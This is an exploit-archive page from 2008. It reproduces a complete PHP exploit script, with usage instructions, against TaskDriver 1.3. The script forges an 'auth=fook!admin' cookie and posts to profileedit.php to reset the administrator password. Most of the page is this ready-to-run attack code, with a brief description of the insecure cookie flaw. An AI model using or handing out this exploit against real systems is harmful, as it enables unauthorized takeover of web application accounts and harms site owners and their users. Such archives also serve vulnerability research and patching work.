[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : TaskDriver <= 1.3 Remote Change Admin Password Exploit
# Published : 2008-12-29
# Author : cOndemned
# Previous Title : Joomla Component Volunteer 2.0 (job_id) SQL Injection Vulnerability
# Next Title : FubarForum 1.6 Admin Bypass Change User Password Vulnerability
<?php
/*
$Id: taskdriver-1.3.php,v 0.1 2008/12/03 04:04:28 cOndemned Exp $
TaskDriver <= 1.3 Remote Change Admin Password Exploit
Bug found && Exploited by cOndemned
Download:
http://www.taskdriver.com/downtrack/index.php?down=2
Description:
This exploit uses insecure cookie handling flaw in order
to compromisse the system. In the begining its almost like
the one that Silentz wrote for version 1.2 but not exactly.
Actually there is no need to use sql injection for gaining
admin password (hash). We can just set cookie value to :
"auth=fook!admin"
access profileedit.php and change his password for whatever
we want to x]
Next IMO nice thing is that it works both with magic quotes
on and off :P
-------------------------------------------------------------------
Greetz:
ZaBeaTy, Avantura, l5x, str0ke, d2, sid.psycho & TWT, 0in,
doctor, Gynvael Coldwind ...
http://www.youtube.com/watch?v=f7O6ekKOE9g
*/
echo "n[~] TaskDriver <= 1.3 Remote Change Admin Password Exploit";
echo "n[~] Bug found && Exploited by cOndemnedn";
if($argc != 3)
{
printf("[!] Usage: php %s <target> <new-password>nn", $argv[0]);
exit;
}
list($script, $target, $pass) = $argv;
$xpl = curl_init();
curl_setopt_array($xpl, array
(
CURLOPT_URL => "{$target}/profileedit.php",
CURLOPT_COOKIE => "auth=fook!admin",
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => "password={$pass}"
));
$ret = curl_exec($xpl);
curl_close($xpl);
$out = preg_match_all('#<b>Profile Updated</b>#', $ret, $tmp) ? "[+] Done. You can login nownn" : "[-] Exploitation failednn";
echo $out;
?>
# www.Syue.com [2008-12-29]